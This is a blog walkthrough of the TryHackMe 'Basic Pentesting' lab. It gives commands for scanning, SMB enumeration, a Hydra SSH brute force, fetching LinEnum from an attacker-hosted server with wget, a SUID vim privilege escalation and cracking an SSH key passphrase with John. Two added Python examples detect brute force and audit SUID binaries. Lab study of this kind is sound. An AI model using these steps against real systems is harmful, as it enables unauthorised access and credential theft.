TryHackMe: Basic Pentesting — Walkthrough

December 15, 2024, by Jasper

Hi! It is time to look at the Basic Pentesting room on TryHackMe. I am making these walkthroughs to keep myself motivated to learn cyber security, and to ensure that I remember the knowledge gained from THM's rooms.
Join me in learning cyber security. I will try to explain concepts as I go, to differentiate myself from other walkthroughs.

Room URL: https://tryhackme.com/room/basicpentestingjt


Task 1 (Web App Testing and Privilege Escalation)

In this set of tasks you'll learn the following:

  • brute forcing
  • hash cracking
  • service enumeration
  • Linux enumeration

Credits to Josiah Pierce from Vulnhub.

Questions

Deploy the machine and connect to our network

Answer: No answer needed

Find the services exposed by the machine

This time I decided to use the following command:

nmap -sC -sV -oN nmap -p- <target ip>

The open ports are:

Port mapping!

We can see an SSH service, SMB and a web server, in addition to Jserv (AJP) and Tomcat.

And the script results:

Nmap script results

Answer: No answer needed

What is the name of the hidden directory on the web server (enter name without /)?

There is a web server running on port 80:

Visiting the home page

We can take a look at the source code:

Looking at the source code

Dev section…hmm.

Let’s search for hidden directories by using dirbuster or gobuster. We will use gobuster here. We can use the following command:

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u <target ip>

Using gobuster

We found a development page. Maybe this is the one referred to in the source code!

Answer: development

User brute-forcing to find the username & password

Let’s have a look at the page we found:

Accessing the development page

Interesting. We get to see the files in the directory. Let’s have a look at both:

dev.txt:

Reading dev.txt

j.txt:

Reading j.txt

A bunch of info here. We learn about Apache and SMB, but more importantly the author of dev.txt mentions Apache Struts, which is a Java web application framework. He also mentions version 2.5.12 and that he used a REST version.

In the other file we get a hint about weak credentials found in the /etc/shadow file.

But we don't have access to the system yet!

Remember back from the port scanning that we discovered SMB? Let’s enumerate that. We do this with the following command:

enum4linux <target ip>

This gives us a bunch of info on the SMB service:

Running enum4linux

We can see that anonymous access is possible using an empty username ('') and an empty password (''). A bit further below we read the following lines:

Discovered two user accounts

Jan and Kay. Sure sounds like the users mentioned in j.txt. So we can pretty much conclude that Jan has a weak password.

Let's try to brute-force Jan's SSH account with Hydra! We can use the following command:

hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://<target ip>

Let it run for a bit and you will find the answer:

Cracking Jan’s SSH access

Armando!
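Seen from the defender's side, the Hydra run above leaves a very recognisable trace in the server's auth.log. The following Python is added here as an example and is not part of the original walkthrough: it parses constructed sshd log lines (host name, IPs and timestamps are made up) and flags a burst of failed logins from one source, noting when a success from the same source follows the burst, which is the signature of a guessed password.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample auth.log lines (not taken from the room), in syslog format.
SAMPLE_AUTH_LOG = """\
Dec 15 10:01:02 basic2 sshd[1201]: Failed password for jan from 10.9.0.5 port 51202 ssh2
Dec 15 10:01:03 basic2 sshd[1203]: Failed password for jan from 10.9.0.5 port 51204 ssh2
Dec 15 10:01:03 basic2 sshd[1205]: Failed password for jan from 10.9.0.5 port 51206 ssh2
Dec 15 10:01:04 basic2 sshd[1207]: Failed password for jan from 10.9.0.5 port 51208 ssh2
Dec 15 10:01:05 basic2 sshd[1209]: Failed password for jan from 10.9.0.5 port 51210 ssh2
Dec 15 10:01:06 basic2 sshd[1211]: Accepted password for jan from 10.9.0.5 port 51212 ssh2
Dec 15 10:30:00 basic2 sshd[1300]: Failed password for kay from 10.9.0.7 port 40000 ssh2
Dec 15 11:30:00 basic2 sshd[1301]: Accepted publickey for kay from 10.9.0.7 port 40002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?:password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

def parse_line(line, year=2024):
    """Return (timestamp, result, user, ip) for an sshd login line, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
    return ts, m["result"], m["user"], m["ip"]

def detect_bruteforce(log_text, threshold=5, window_seconds=60):
    """Flag (ip, user) pairs with >= threshold failures inside a sliding window;
    'success_after' is set when a login from the same source succeeds while the
    failure burst is still inside the window."""
    recent = defaultdict(list)   # (ip, user) -> failure timestamps still in window
    alerts = {}
    for ts, result, user, ip in filter(None, map(parse_line, log_text.splitlines())):
        key = (ip, user)
        window = [t for t in recent[key] if (ts - t).total_seconds() <= window_seconds]
        if result == "Failed":
            window.append(ts)
            if len(window) >= threshold:
                alert = alerts.setdefault(key, {"failures": 0, "success_after": False})
                alert["failures"] = max(alert["failures"], len(window))
        elif key in alerts and window:
            alerts[key]["success_after"] = True
        recent[key] = window
    return alerts
```

Call detect_bruteforce(SAMPLE_AUTH_LOG) to see jan's burst flagged while kay's single failure is not; a real deployment would feed this from /var/log/auth.log and pair it with rate limiting such as fail2ban or key-only authentication.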

Answer: No answer needed

What is the username?

Answer: jan

BONUS:

We could also have figured this out by accessing the anonymous share through smbclient:

Accessing the SMB anonymous share

If we read this txt file:

Reading staff.txt

What is the password?

See above to find the cracked password.

Answer: armando

What service do you use to access the server (answer in abbreviation in all caps)?

We have seen a SSH service running.

Answer: SSH

Enumerate the machine to find any vectors for privilege escalation

We can now login with SSH. We can use the following command:

ssh jan@<ip>

Then enter the password when prompted. We get access to jan's home directory:

Logging into SSH

If we look a bit further we can get into Kay’s home directory as well:

Finding Kay’s home directory

We can see pass.bak, which is a backup of some kind. Maybe a password?

To find a way to escalate privileges we can use a tool such as LinEnum to get more info on possible attack vectors. We need to do the following:

  1. Download LinEnum from here: https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh
    You can copy the RAW text and save it into a file called LinEnum.
  2. Start a simple Python web server from the directory of the new file: python -m http.server 8000.
  3. Download the file from the target machine: wget http://<attacker ip>:8000/LinEnum
  4. Give yourself executable permission on the file: chmod +x LinEnum
  5. Run it!

Alternatively you can use scp to copy it over!

Read through the results. I will paste a few interesting tidbits here:

LinEnum admin user results

We can see that Kay is an admin.

Can we read/write sensitive files?

We can read the passwd file, but not the shadow file.

Possibly interesting SUID file

Now this is interesting. vim.basic is a SUID binary, meaning it runs with its owner's (root's) privileges no matter who starts it. So we can use vim to read the pass.bak file from earlier!
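The defensive root cause here is a SUID bit on a binary that should never carry one. This Python audit script is added here as an example and is not part of the original walkthrough or of LinEnum: it compares SUID-root files against an assumed baseline of SUID binaries that a Debian/Ubuntu host normally ships, and flags everything else. The baseline set and the sample snapshot are assumptions made for the example.

```python
import os
import stat

# Assumed baseline of SUID-root binaries a Debian/Ubuntu host normally ships.
# Build your own from a clean image of the same release before relying on it.
EXPECTED_SUID = {
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/su", "/usr/bin/chsh", "/usr/bin/chfn",
    "/usr/bin/gpasswd", "/usr/bin/newgrp", "/usr/bin/mount", "/usr/bin/umount",
    "/bin/su", "/bin/mount", "/bin/umount", "/bin/ping",
}

def is_suid_root(mode, uid):
    """True for a regular file that has the set-uid bit and is owned by root (uid 0)."""
    return stat.S_ISREG(mode) and bool(mode & stat.S_ISUID) and uid == 0

def audit_suid(entries, expected=EXPECTED_SUID):
    """entries: iterable of (path, mode, uid). Returns the sorted paths of SUID-root
    files that are not in the expected baseline, i.e. the ones to investigate."""
    return sorted(p for p, mode, uid in entries if is_suid_root(mode, uid) and p not in expected)

def walk_filesystem(root="/"):
    """Yield (path, mode, uid) for every file under root; unreadable entries are skipped."""
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            yield path, st.st_mode, st.st_uid

# Constructed sample snapshot (not the room's real listing) so the audit runs offline.
# 0o104755 = regular file + set-uid bit + rwxr-xr-x; 0o100755 = the same without set-uid.
SAMPLE_SNAPSHOT = [
    ("/usr/bin/passwd", 0o104755, 0),      # SUID root, in the baseline
    ("/usr/bin/vim.basic", 0o104755, 0),   # SUID root, not in the baseline: flagged
    ("/usr/bin/vim.tiny", 0o100755, 0),    # no SUID bit
    ("/home/kay/tool", 0o104755, 1001),    # SUID, but owned by an ordinary user
]

if __name__ == "__main__":
    for path in audit_suid(SAMPLE_SNAPSHOT):
        print("unexpected SUID-root binary:", path)
```

On a real host pass walk_filesystem("/usr") to audit_suid; the fix for a hit like vim.basic is to drop the bit (chmod u-s) or reinstall the package-managed build, and a file-integrity monitor such as AIDE can catch the bit reappearing.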

Reading the pass.bak file

This is actually the answer to the final question!

We can now change user with the new password:

Switching user account to kay

Answer: No answer needed

What is the name of the other user you found (all lower case)?

Answer: kay

If you have found another user, what can you do with this information?

Listing files in Kay’s home directory

Well, here’s the thing. I already answered the final question. But on a more thorough look we can find out something interesting in Kay’s .ssh directory. There is a private key!

We can try logging in:

ssh kay@10.10.225.25 -i /home/kay/.ssh/id_rsa

Unfortunately the key is protected by a passphrase we don't know:

Trying to gain SSH access to kay

We can use John the Ripper to crack this, specifically its ssh2john helper. On my machine it is located here:

Locating ssh2john

Let's run the following command after saving the RSA key on the attacker machine:

/opt/john/ssh2john.py kay_id_rsa > john_hash.txt

Now we can run John:

john john_hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

And we find the passphrase:

Finding the passphrase with john

Now we can login:

ssh kay@10.10.225.25 -i /home/kay/.ssh/id_rsa

Logging into Kay's SSH

And enter the passphrase beeswax.

This was another way in!

Answer: No answer needed

What is the final password you obtain?

We found this earlier through vim.

Answer: heresareallystrongpasswordthatfollowsthepasswordpolicy

Thanks for reading. Hopefully you found out that there are many ways to get root access 🙂


Like my articles?

You are welcome to give my article a clap or two 🙂
I would be so grateful if you support me by buying me a cup of coffee:

I learned a lot through HackTheBox’s Academy. If you want to sign up, you can get extra cubes, and support me in the process, if you use the following link:

HTB Academy : Cybersecurity Training
Sign up for the best cybersecurity training courses and certifications! Enjoy browser-based interactive learning for…referral.hackthebox.com
